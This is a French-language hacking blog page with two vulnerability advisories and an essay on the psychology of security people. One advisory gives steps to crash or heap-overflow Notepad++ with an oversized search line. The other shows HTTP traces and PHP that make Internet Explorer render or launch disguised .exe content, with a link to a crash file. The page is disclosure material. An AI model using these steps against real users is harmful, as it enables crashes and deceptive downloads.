PLANETE UNDERGROUND (BETA)

Notepad++ Multiples vulns 

###############################################################################
# Notepad++ multiples vulnerabilities:
# Vendor: http://notepad-plus.sourceforge.net
# Impact : kind of critical
# Vendors status: patching ...
# Bugs: multiples heap overflow,N.D.P (Null Dereference Pointer)
#
# Comment:
# Déjà je dois avouer que j'adore notepad++ c'est l'éditeur parfaitement conçu pour un
# auditeur.
# Hélas on as quelques bugs facilement détectable dessus :
#
# 1) Long filename Dénial of Service(Null Dereference pointer): 200 chars filename suffisent pour faire planter le soft
# 2) Search heap overflow ( pas cool pantoute :/ )
# 3) big file heap overflow
#
# le 1) et le 3) sont des classiques dans ce genre d'audit, le long filename nous DoS notepad++ , et le big file (~250 mo)
# nous heap overflow notepad++.
# Mais le 2) est relativement funny héhé :)
# On sais que un auditeur qui va auditer un software quelqu'onque va commencer par le search sur
# des fonctions basic que l'ont sais relativement vulnerables si elles sont mal utilisées...
# comme : strcpy,strcat,fgets,sprintf,vprintf,vfprintf,vsprintf,vsnprintf,etc,etc
# en PHP pareil : eval(),system(),include(),etc etc
# donc , il fait un search (comme je le ferais moi meme) dans un directory pour checker
# comment est constitué le cms/software, voir comment il utilise ces fonctions,etc ...
# donc par exemple,disons que la premiere chose que Mr-X check c'est un snprintf,
# si il utilise l'option usefull de notepad++ le search dans le repertoire
#( les puristes me parlerons de grep ,m'en branle solidement dans ce cas-ci.)
# il se fera powned a partir du moment que la ligne dans laquelle le string qu'il cherche
# fais plus que 4098 chars...héhé ...
# mais comment reproduire ca ? create un fichier nommée blabla.txt avec powned AAAAAA x 5000 dedans, et un autre blibli.txt .
# dans blibli.txt mettez whatever, ouvre blibli.txt et faites un search pour le string "powned"
# boom :]

[ 7 comments ] ( 1166 views ) permalink ( 3.2 / 705 )
psychologie et hacking 

pre-reading here


Une des choses qu'on remarque depuis l'aire de l'industrialisation est que l'être humain devient débile à faire de faire toujours la même chose. Visser des boulons à la GM rend neo-zombie et c'est normal.

Mais qu'en est-il de la sécurité informatique?

On remarque en analysant le domaine, qu'effectivement il porte bien son nom, il s'agit de sécurité ET d'informatique. 2 choses complètement différentes qui forment un tout que l'ont connait bien.

Malheureusement, les défauts psychologiques de bases provenant des déformations professionnelles de chaque domaine se rapporte aussi au produit final.

En informatique, on sait tous qu'on est des asperges. À force de travailler et de parler avec des machines, on oublie plusieurs éléments essentiels de l'être humain et on devient du genre autistique. Le concept d'asperger vaut la peine d'être compris, donc read on:
http://en.wikipedia.org/wiki/Asperger_syndrome
qui se résume à "difficulties in social interaction and by restricted, stereotyped patterns of behavior, interests and activities"

Autrement dit on s'enferme dans nos mondes et on a de la misère à se faire comprendre par les autres. Vous vous en rendez pas compte parce que vous êtes un lémurien, mais mettez n'importe quel neo-zombie dans un party de lémurien et vous obtenez quelqu'un qui s'emmerde.

Donc, une fois asperge on à tendance à devenir "anti-social". Ce qui amène à détester la société, à détester ce qui établie, car anyways la masse nous comprends pas, alors pourquoi jouer leur game?

Ça ne veut pas dire que tout les informaticiens sont des asperges, mais tout ceux qui en abuse se font attirer par le coté obscure de la force un jour ou l'autre et finissent par coder tout seul le soir à la maison en buvant une bière.

Enough said about the lémurien générique. Maintenant regardont le concept de sécurité.

La sécurité sans être mélangée avec l'informatique revient à protéger quelque chose, généralement de quelqu'un ou d'une catastrophe.

On serait tanter de dire que le meilleur exemple c'est la police. Mais ce n'est pas le cas. La police s'ils abusent, finissent par se faire réprimander royalement ou encore tirer une balle dans le front. Les gardes de sécurités sont un meilleur exemple. Eux y'on plus de l'attitude, et généralement il abuse car il n'ont pas vraiment de vrai pouvoir.

Donc en prends cette mentalité la de sécurité, et on scrute un peu. La personne doit en tout temps se méfier. C'est sa job. Quelqu'un entre dans le bulding, est-ce un bandit? Il est 11h pm et il semble venir starter son chiffre.. est-ce un bandit ou une asperge qui commence sa journée de travail? Toujours le questionnement, toujours la méfiance. C'est sa job.

Répéter ça 8h par jour, 5 jours par semaines avec des chiffres de 12 heures, et vous avez maintenant l'attitude d'un garde de sécurité qui se croit.

Encore la, c'est pas tout les gardes qui sont de ce genre la. Y'en a qui sont cool, qui comprennent qu'il sont en faite juste un concierge qui doit rester prudent mais gentil en même temps. Qu'ils sont payer cher pour lire le journal et écouter la TV, paske c eux autres qui se font buter en premier si ya un raid.

Donc bref, la sécurité instaure une méfiance. Curieusement, et c'est la que le mélange est explosif, un certaine confiance en soit doit s'installer profondément dans une personne qui fait la sécurité. Elle est convaincu d'être le good guy hein? C'est alors que l'over confiance entre en jeu. Si un garde n'a pas confiance en lui, alors comment il va spotter le truant, comment il va pouvoir se défendre en cas d'attaque. Il faut aussi laisser une image de confiance pour que les gens nous fassent confiance.

Dans le monde réel, certains suivent des cours de karaté d'auto défense et etc, mais au niveau psychologique, tout ce que ça fait, c'est la même chose que dans un monde virtuel : on se bâtie une confiance en soit. Malheureusement ben du monde savent pas pentoute comment faire, et se bâtissent un égo-confiance en soit. C'est le piège que tout le monde fait, et que la majorité de la populace qui ont supposément confiance en eux font. Bâtir sa confiance sur son égo, c'est bâtir une confiance d'une image de soi-même... ça peut marcher quand on est le bonhomme qui reste au fond du couloir à lire le journal, mais dès que quelqu'un rentre dans la bulle, oh lala l'égo se défends car il fait face au jugement d'un autre.

Bon,
nous voila donc maintenant prêt à faire le lien.
Quelqu'un en informatique. Quelqu'un en sécurité.
Un asperge. Un parano.
La même personne.

Voila où on est donc rendu. En plus les défauts se mélange bien, quoi de plus convivial qu'un anti-social pour être parano. Perfect match. Aussi, quoi de plus convivial qu'un gros égo sur de lui, et une personne qui ne fait que se focusser que sur SON domaine (un connaisseur).

Le mélange donne du monde qui sont en sécurité, qui sont très bon voir même excellent dans le travail, qui ont une forte passion pour la chose, mais qui en même temps sont des totals assholes avec qui sont généralement pas agréable à cotoyer.

Peut-être ce n'est pas applicable car tout pousser? C'est vrai, y'a pas que des épais.. mais à un moment donné ou un autre, à force de faire de la sécurité informatique abusivement, on fini par développer le pattern et à embracer ce coté la.

re-lire encore l'article :
http://lists.immunitysec.com/pipermail/ ... 05108.html
On y voit donc apparamment 2 pôles.. le hacker blackhat qui dit que c'est une passion et les whitehats qui se font chier dessus. L'auteur est visiblement dans un groupe et contre l'autre, du moins, si ce n'est
pas du black vs white il trace une ligne entre lui et les autres. Yé bad, yé désolé, yé écoeuré, y trouve que le hacking ça suxx et surtout qu'il est différent!

.. WRONG!

Si on tient en considération tout l'article que vous lisez présentement, on voit que finalement, l'auteur est juste quelqu'un en sécurité informatique (ya beau pas travailler dans le domaine, si son brain est mostly occupé à faire ça dans sa vie on peut dire qu'il fait partie du dit domaine autant que quelqu'un qui work la dessus de 9 à 5) qui dumpshit sur d'autres en sécurité informatique.

En bref, une asperge parano qui chiale contre d'autres asperges paranos.

La on est rendu à la fin du post.. et on a un goût morose dans bouche unpeu comme quand on lit le post de LMH sur info-pull.com...

Eh bien, garder le sourire, car l'informatique et surtout la sécurité informatique est à l'age de pierre encore. On ne voit que les débuts.. tranquillement pas vite le domaine va s'ouvrir sur le monde, et ça va finir par soit A) avoir de l'allure ou B) ne plus exister.


LastCall_'s out.

++


[ 17 comments ] ( 3530 views ) permalink ( 3.1 / 668 )
IE ALL (windows) Download/File Security Bypass  

#################################################################################################
# Product : IE ALL (windows)
# Bug : Download/File Security Bypass
# From : Remote
#
# If you create an empty file called test.exe in your /www/ folder when you get it via IE , FF , Opera , etc, you'll
# get prompted for download/execute the file, right.
#
# But if we put inside our .exe , some html like a simple :
# <html>
# <head><title>bou!</title></head>
# <body>
# <script>window.print()</script>
# </body>
# </html>
#
# What happens ?
# Firefox ,Opera still ask for download the .exe, but IE * execute this html =)
#
# Another exemple :
# If we put instead of the html code , some header like the pdf one :
# %PDF-1.4
#
# What happens ?
# IE says "Internet Explorer can not display this Web page"
#
# But in reality , our file got downloaded & adobe was launched "silently" (just have a look in TaskManager)
# To prove my point you can try this file with IE * (acrobat reader * should crash) : http://209.190.122.178/HI2.exe
# This file is a DoS that i've discoverered in acrobat reader renamed with an exe extension, the advisory is located here : http://milw0rm.com/exploits/5687
#
# So what's going on ?
#
# Let's try the pdf thing:

GET /HI2.exe HTTP/1.0
Host: Whatever.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob) // Internet Explorer use Mozilla/***(compatible; MSIE, for understanding what is made for Netscape...
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shock
wave-flash, */*
Accept-Language: fr-ca
Connection: Keep-Alive


Response Header:
HTTP/1.1 200 OK
Date: Fri, 20 Jun 2008 15:29:25 GMT
Server: Apache
Last-Modified: Thu, 19 Jun 2008 20:46:16 GMT
ETag: "a010c-2db3b-4500b118a9600"
Accept-Ranges: bytes
Content-Length: 187195
Keep-Alive: timeout=10, max=75
Connection: Keep-Alive
Content-Type: application/x-msdownload


# Now let's see the print one:

GET /print.exe HTTP/1.0
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shock
wave-flash, */*
Accept-Language: fr-ca
Connection: Keep-Alive


Response Header:

HTTP/1.1 200 OK
Date: Fri, 20 Jun 2008 15:32:10 GMT
Server: Apache
Last-Modified: Wed, 18 Jun 2008 17:51:19 GMT
ETag: "a010a-63-44ff48207b3c0"
Accept-Ranges: bytes
Content-Length: 99
Keep-Alive: timeout=10, max=75
Connection: Keep-Alive
Content-Type: application/x-msdownload


# Let's do a test :
<?php
header('Content-type: application/x-msdownload');
header('Content-Disposition: attachment; filename="print.exe"');
readfile('print.exe');
?>
# Working as it should, you will get prompted for a download on all browsers
<?php
header('Content-type: application/x-msdownload');
readfile('HI2.exe');
?>
# Firefox & Netscape ask for download file.php, Opera ask for download file.exe, and IE show the content of file.exe.
# So if no Content-Disposition: is supplied with the Content-Type:application/x-msdownload ,IE try to read the file,
# unless to check the extension, and prompt ANYWAYS for download/execute.
#
# But wait a minute, there's a funny bug here ( http://milw0rm.com/exploits/641 ):
# http://site.com/123456.exe?12345.log //notepad is launched with the content of the 123456.exe (you need a real executable btw .)
# This still unpatched on IE * , i guess this advisory explain the whole fuck
# So what can we do with this ? we can easly pown urlmon.dll, but this is another advisory that will be related to this one :]
#
#
# So let's think ,Microsoft suggest that safari users, should remove them browser, because of the unsecure file download policy.
# ( http://www.microsoft.com/technet/securi ... 53818.mspx , http://cve.mitre.org/cgi-bin/cvename.cg ... -2007-4424 )
#
# Then i guess i should suggest to IE's users to use Firefox as a default browser, untill Microsoft stops them strategic marketing propaganda
# and then review their software specially designed to get powned since 1995 a.k.a IE 1.0
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"

Reference on IE6:
http://support.microsoft.com/kb/329661/en-us/

[ 66 comments ] ( 21195 views ) permalink ( 2.9 / 607 )

| 1 | 2 | 3 | 4 | 5 | 6 | 7 |